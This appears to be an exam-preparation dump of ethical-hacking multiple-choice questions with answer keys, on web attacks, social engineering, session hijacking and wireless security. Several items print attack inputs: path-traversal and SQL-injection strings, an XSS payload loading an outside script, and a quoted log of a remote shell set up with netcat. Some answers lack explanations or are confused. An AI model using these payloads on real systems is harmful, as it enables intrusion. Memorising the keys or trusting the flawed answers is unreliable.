347 Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f %70%61%73%73%77%64 The request is made up of: %2e%2e%2f%2e%2e%2f%2e%2f% = ../../../ %65%74%63 = etc %2f = / %70%61%73%73%77%64 = passwd How would you protect information systems from these attacks? A. Configure Web Server to deny requests involving Unicode characters. B. Create rules in IDS to alert on strange Unicode requests. C. Use SSL authentication on Web Servers. D. Enable Active Scripts Detection at the firewall and routers. 208

B Explanation: This is a typical Unicode attack. By configuring your IDS to trigger on strange Unicode requests you can protect your web-server from this type of attacks.

307 184 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe. This is an example of what kind of attack? A. Reverse Psychology B. Social Engineering C. Reverse Engineering D. Spoofing Identity E. Faking Identity

B Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.

318 Dave has been assigned to test the network security of Acme Corp. The test was announced to the employees. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a sand clock to mark the progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond? A. The attack did not fall through as the firewall blocked the traffic B. The attack was social engineering and the firewall did not detect it C. The attack was deception and security was not directly compromised D. Security was not compromised as the webpage was hosted internally

B Explanation: This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react. 191

317 Sabotage, Advertising and Covering are the three stages of _____ A. Social engineering B. Reverse Social Engineering C. Reverse Software Engineering D. Rapid Development Engineering

B Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.

309 What are the six types of social engineering?(Choose six). A. Spoofing B. Reciprocation C. Social Validation D. Commitment E. Friendship F. Scarcity G. Authority H. Accountability

B,C,D,E,F,G Explanation: All social engineering is performed by taking advantage of human nature. For indepth information on the subject review, read Robert Cialdini's book, Influence: Science and Practice.

394 Bank of Timbukut is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web Application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a web browser. John Stevens is in charge of information security at Bank of Timbukut. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed ! However, money hasn't been removed from the bank, instead money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web Application's logs and found the following entries. What kind of attack did the Hacker attempt to carry out at the Bank? A. Brute Force attack in which the Hacker attempted guessing login ID and password from password cracking tools B. The Hacker used a generator module to pass results to the Web Server and exploited Web Application CGI vulnerability. C. The Hacker first attempted logins with suspected user names, then used SQL injection to gain access to valid login IDs D. The Hacker attempted Session Hijacking, in which the hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.

C 237 Explanation: Typing things like ' or 1=1 - in the login field is evidence of a hacker trying out if the system is vulnerable to SQL injection. Topic 15, Hacking Wireless Networks

322 Bob is going to perform an active session hijack against company. He has acquired the target that allows session oriented connections (Telnet) and performs sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. So, what is Bob most likely to do next? A. Take over the session. B. Reverse sequence prediction. C. Guess the sequence numbers. 193 D. Take one of the parties' offline.

C Explanation:

352 Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? A. You cannot use a buffer overflow to deface a web page B. There is a problem with the shell and he needs to run the attack again C. The HTML file has permissions of read only D. The system is a honeypot

C Explanation:

380 The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a 226 malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 e-cmd1.exe" What can you infer from the exploit given? A. It is a local exploit where the attacker logs in using username johna2k. B. There are two attackers on the system - johna2k and haxedj00. C. The attack is a remote exploit and the hacker downloads three files. D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

C Explanation:

339 What are the three phases involved in security testing? A. Reconnaissance, Conduct, Report B. Reconnaissance, Scanning, Conclusion C. Preparation, Conduct, Conclusion D. Preparation, Conduct, Billing

C Explanation: Preparation phase - A formal contract is executed containing non-disclosure of the client's data and legal protection for the tester. At a minimum, it also lists the IP addresses to be tested and time to test. Conduct phase - In this phase the penetration test is executed, with the tester looking for potential vulnerabilities. Conclusion phase - The results of the evaluation are communicated to the pre-defined organizational contact, and corrective action is advised. 202

388 Central Frost Bank was a medium-sized, regional financial institution in New York. The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a Web browser. John Stevens was in charge of information security at Central Frost Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances ofmany of Central Frost's customers had been changed! However, moneyhadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries: Attempted login of unknown user: johnm 232 Attempted login of unknown user: susaR Attempted login of unknown user: sencat Attempted login of unknown user: pete''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x9062757944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike What type of attack did the Hacker attempt? A. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools. B. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability. C. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. D. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.

C Explanation: The 1=1 or drop table logins are attempts at SQL injection.

393 Look at the following SQL query. SELECT * FROM product WHERE PCategory='computers' or 1=1--' What will it return? Select the best answer. A. All computers and all 1's B. All computers C. All computers and everything else D. Everything except computers

C Explanation: The 1=1 tells the SQL database to return everything, a simplified statement would be SELECT * FROM product WHERE 1=1 (which will always be true for all columns). Thus, this query will return all computers and everything else. The or 1=1 is a common test to see if a web application is vulnerable to a SQL attack. 236

387 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer) A. Cover his tracks by eradicating the log files and audit trails. B. Gain access to the remote computer in order to conceal the venue of attacks. C. Perform a reconnaissance of the remote target for identical of venue of attacks. D. Always begin with a scan in order to quickly identify venue of attacks.

C Explanation: A hacker always starts with a preparatory phase (Reconnaissance) where he seeks to gather as much information as possible about the target of evaluation prior to launching an attack. The reconnaissance can be either passive or active (or both).

315 A majority of attacks come from insiders, people who have direct access to a company's computer system as part of their job function or a business relationship. Who is considered an insider? A. The CEO of the company because he has access to all of the computer systems B. A government agency since they know the company computer system strengths and weaknesses C. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants D. A competitor to the company because they can directly benefit from the publicity generated by making such an attack

C Explanation: An insider is anyone who already has an foot inside one way or another.

348 An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the price? A. By using SQL injection B. By using cross site scripting C. By changing hidden form values in a local copy of the web page D. There is no way the attacker could do this without directly compromising either the web server or the database

C Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.

368 Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? 219 A. An integer variable B. A 'hidden' price value C. A 'hidden' form field value D. A page cannot be changed locally; it can only be served by a web server

C Explanation: Changing hidden form values is possible when a web site is poorly built and is trusting the visitors computer to submit vital data, like the price of a product, to the database.

344 ____________ will let you assume a users identity at a dynamically generated web page or site. A. SQL attack B. Injection attack C. Cross site scripting D. The shell attack E. Winzapper

C Explanation: Cross site scripting is also referred to as XSS or CSS. You must know the user is online and you must scam that user into clicking on a link that you have sent in order for this hack attack to work.

391 Identify SQL injection attack from the HTTP requests shown below: A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999 B. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al C. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass wd%3d%27hAx0r%27%3b--%00 D. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser ver.c0m%2fbadscript.js%22% 3e%3c%2fscript%3e

C Explanation: Explantion: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r

367 Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to? A. Cross Site Scripting B. SQL injection Attack C. Format String Attack D. Unicode Traversal Attack

C Explanation: Format string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .

337 On a default installation of Microsoft IIS web server, under which privilege does the web server software execute? A. Everyone B. Guest C. System D. Administrator

C Explanation: If not changed during the installation, IIS will execute as Local System with way to high privileges.

333 You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges? A. Administrator B. IUSR_COMPUTERNAME C. LOCAL_SYSTEM D. Whatever account IIS was installed with

C Explanation: If you manage to get the system to start a shell for you, that shell will be running as LOCAL_SYSTEM.

383 Bob has been hired to do a web application security test. Bob notices that the site is dynamic and infers that they mist be making use of a database at the application back end. Bob wants to validate whether SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL requests? A. Semi Column B. Double Quote C. Single Quote D. Exclamation Mark 229

C Explanation: In SQL single quotes are used around values in queries, by entering another single quote Bob tests if the application will submit a null value and probably returning an error.

361 You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from 215 inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing ? A. Black box testing B. Black hat testing C. Gray box testing D. Gray hat testing E. White box testing F. White hat testing

C Explanation: Internal Testing is also referred to as Gray-box testing.

357 Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always make use of a basic Web Browser to perform such testing. Which of the following web browser can adequately fill this purpose? A. Internet Explorer B. Mozila C. Lynx D. Tiger

C Explanation: Lynx is a program used to browse the World Wide Web, which works on simple text 213 - - - terminals, rather than requiring a graphical computer display terminal.

376 Which of the following is the best way an attacker can passively learn about technologies used in an organization? A. By sending web bugs to key personnel B. By webcrawling the organization web site C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization D. By performing a port scan on the organization's web site

C Explanation: Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive" 224

358 Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive obtain from the client before commencing his test? A. IP Range, OS, and patches installed. B. Only the IP address range. C. Nothing but corporate name. D. All that is available from the client site.

C Explanation: Penetration tests can be conducted in one of two ways: black-box (with no prior knowledge the infrastructure to be tested) or white-box (with complete knowledge of the infrastructure to be tested). As you might expect, there are conflicting opinions about this choice and the value that either approach will bring to a project.

386 Which of the following activities will not be considered passive footprinting? A. Go through the rubbish to find out any information that might have been discarded B. Search on financial site such as Yahoo Financial to identify assets C. Scan the range of IP address found in the target DNS database D. Perform multiples queries using a search engine 231

C Explanation: Scanning is not considered to be passive footprinting.

304 Why is Social Engineering considered attractive by hackers and also adopted by experts in the field? A. It is done by well known hackers and in movies as well. B. It does not require a computer in order to commit a crime. C. It is easy and extremely effective to gain information. D. It is not considered illegal.

C Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most (but not all) cases the attacker never comes face-to-face with the victim. The term has been popularized in recent years by well known (reformed) computer criminal and security consultant Kevin Mitnick who points out that it's much easier to trick someone into giving you his or her password for a system than to spend the effort to hack in. He claims it to be the single most effective method in his arsenal.

320 Jack Hackers wants to break into Brown's Computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co. pretending to be an administrator from Brown Co. Jack tell Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss and parts her password. Jack can now access Brown Co.'s computer with a valid username and password to steal the cookie recipe. What kind of attack is being illustrated here? A. Faking Identity B. Spoofing Identity C. Social Engineering D. Reverse Psychology E. Reverse Engineering 192

C Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most cases the attacker never comes face-to-face with the victim.

350 What are the differences between SSL and S-HTTP? A. SSL operates at the network layer and S-HTTP operates at the application layer B. SSL operates at the application layer and S-HTTP operates at the network layer C. SSL operates at the transport layer and S-HTTP operates at the application layer D. SSL operates at the application layer and S-HTTP operates at the transport layer

C Explanation: The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer and mimics the "socket library," while S-HTTP operates at the application layer. Encryption of the transport layer allows SSL to be application-independent, while S-HTTP is limited to the specific software implementing it. The protocols adopt different philosophies towards encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.

310 What does the following command achieve? Telnet <IP Address> <Port 80> HEAD /HTTP/1.0 <Return> <Return> A. This command returns the home page for the IP address specified 186 B. This command opens a backdoor Telnet session to the IP address specified C. This command returns the banner of the website specified by IP address D. This command allows a hacker to determine the sites security E. This command is bogus and will accomplish nothing

C Explanation: This command is used for banner grabbing. Banner grabbing helps identify the service and version of web server running.

351 Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? A. Phishing B. Denial of Service C. Cross Site Scripting D. Backdoor installation 210

C Explanation: This is a typical Type-1 Cross Site Scripting attack. This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.

306 Jack Hacker wants to break into company's computers and obtain their secret double fudge cookie recipe. Jacks calls Jane, an accountant at company pretending to be an administrator from company. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss, and parts with her password. Jack can now access company's computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here? (Choose the best answer) A. Reverse Psychology B. Reverse Engineering C. Social Engineering D. Spoofing Identity E. Faking Identity

C Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.

400 In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true? A. With the 300 feet limit of a wireless signal, Ulf's network is safe. B. Wireless signals can be detected from miles away, Ulf's network is not safe. C. Ulf's network will be safe but only of he doesn't switch to 802.11a. D. Ulf's network will not be safe until he also enables WEP.

D Explanation:

338 You are gathering competitive intelligence on ABC.com. You notice that they have jobs 201 listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprint the organization? A. The IP range used by the target network B. An understanding of the number of employees in the company C. How strong the corporate security policy is D. The types of operating systems and applications being used.

D Explanation: From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using.

395 Sandra is conducting a penetration test for ABC.com. She knows that ABC.com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to map the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP. What do you think is the reason behind this? A. Netstumbler does not work against 802.11g. B. You can only pick up 802.11g signals with 802.11a wireless cards. C. The access points probably have WEP enabled so they cannot be detected. D. The access points probably have disabled broadcasting of the SSID so they cannot be detected. E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11b card cannot see an 802.11g signal. F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.

D Explanation: Netstumbler can not detect networks that do not respond to broadcast requests.

326 Which is the right sequence of packets sent during the initial TCP three way handshake? A. FIN, FIN-ACK, ACK B. SYN, URG, ACK C. SYN, ACK, SYN-ACK D. SYN, SYN-ACK, ACK

D Explanation: A TCP connection always starts with a request for synchronization, a SYN, the reply to that would be another SYN together with a ACK to acknowledge that the last package was delivered successfully and the last part of the three way handshake should be only an ACK to acknowledge that the SYN reply was recived. 195

397 RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this? A. There are some flaws in the implementation. B. There is no key management. C. The IV range is too small. D. All of the above. E. None of the above.

D Explanation: Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets. Many WEP systems require a key in hexadecimal format. Some users choose keys that spell words in the limited 0-9, A-F hex character set, for example C0DE C0DE C0DE C0DE. Such keys 239 are often easily guessed.

369 Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ; After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ; What attack is being depicted here? A. Cookie Stealing B. Session Hijacking C. Cross Site Scripting D. Parameter Manipulation

D Explanation: Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit. 220

366 While testing web applications, you attempt to insert the following test script into the search area on the company's web site: <script>alert('Testing Testing Testing')</script> Afterwards, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here? A. A hybrid attack B. A buffer overflow C. Password attacks D. Cross Site Scripting

D Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed 218 by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

327 What is Hunt used for? A. Hunt is used to footprint networks B. Hunt is used to sniff traffic C. Hunt is used to hack web servers D. Hunt is used to intercept traffic i.e. man-in-the-middle traffic E. Hunt is used for password cracking

D Explanation: Hunt can be used to intercept traffic. It is useful with telnet, ftp, and others to grab traffic between two computers or to hijack sessions.

373 What attack is being depicted here? 222 A. Cookie Stealing B. Session Hijacking C. Cross Site scripting D. Parameter Manipulation

D Explanation: Manipulating the data sent between the browser and the web application to an attacker's advantage has long been a simple but effective way to make applications do things in a way the user often shouldn't be able to. In a badly designed and developed web application, malicious users can modify things like prices in web carts, session tokens or values stored in cookies and even HTTP headers. In this case the user has elevated his rights.

334 You wish to determine the operating system and type of web server being used. At the 199 same time you wish to arouse no suspicion within the target organization. While some of the methods listed below work, which holds the least risk of detection? A. Make some phone calls and attempt to retrieve the information using social engineering. B. Use nmap in paranoid mode and scan the web server. C. Telnet to the web server and issue commands to illicit a response. D. Use the netcraft web site look for the target organization's web site.

D Explanation: Netcraft is providing research data and analysis on many aspects of the Internet. Netcraft has explored the Internet since 1995 and is a respected authority on the market share of web servers, operating systems, hosting providers, ISPs, encrypted transactions, electronic commerce, scripting languages and content technologies on the internet.

329 How would you prevent session hijacking attacks? A. Using biometrics access tokens secures sessions against hijacking B. Using non-Internet protocols like http secures sessions against hijacking C. Using hardware-based authentication secures sessions against hijacking D. Using unpredictable sequence numbers secures sessions against hijacking

D Explanation: Protection of a session needs to focus on the unique session identifier because it is the only thing that distinguishes users. If the session ID is compromised, attackers can impersonate other users on the system. The first thing is to ensure that the sequence of identification numbers issued by the session management system is unpredictable; otherwise, it's trivial to hijack another user's session. Having a large number of possible session IDs (meaning that they should be very long) means that there are a lot more permutations for an attacker to try.

374 Annie has just succeeded is stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible? A. Any Cookie can be replayed irrespective of the session status B. The scenario is invalid as a secure cookie can't be replayed C. It works because encryption is performed at the network layer (layer 1 encryption) D. It works because encryption is performed at the application layer (Single Encryption Key)

D Explanation: Single key encryption (conventional cryptography) uses a single word or phrase as the key. The same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver initially need to have a secure way of passing the key from one to the other. With TLS or SSL this would not be possible.

312 Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating? A. issue special cards to access secured doors at the company and provide a one-time only brief 187 description of use of the special card B. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door C. setup a mock video camera next to the special card reader adjacent to the secured door D. to educate all of the employees of the company on best security practices on a recurring basis

D Explanation: Tailgating will not work in small company's where everyone knows everyone, and neither will it work in very large companies where everyone is required to swipe a card to pass, but it's a very simple and effective social engineering attack against mid-sized companies where it's common for one employee not to know everyone. There is two ways of stop this attack either by buying expensive perimeter defense in form of gates that only let on employee pass at every swipe of a card or by educating every employee on a recurring basis.

360 Jim is having no luck performing a penetration test in company's network. He is running the tests from home and has downloaded every security scanner that he could lay his hands on. Despite knowing the IP range of all the systems, and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? A. Security scanners are not designed to do testing through a firewall. B. Security scanners cannot perform vulnerability linkage. C. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. D. All of the above.

D Explanation: The Security scanners available online are often to "outdated" to perform a live pentest against a victim.

316 Which type of hacker represents the highest risk to your network? A. script kiddies B. grey hat hackers C. black hat hackers D. disgruntled employees

D Explanation: The disgruntled users have some permission on your database, versus a hacker who might not get into the database. Global Crossings is a good example of how a disgruntled employee -- who took the internal payroll database home on a hard drive -- caused big problems for the telecommunications company. The employee posted the names, Social Security numbers and birthdates of company employees on his Web site. He may have been one of the factors that helped put them out of business. 190

385 Your boss is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack? A. SQL Input attack B. SQL Piggybacking attack C. SQL Select attack D. SQL Injection attack

D Explanation: This technique is known as SQL injection attack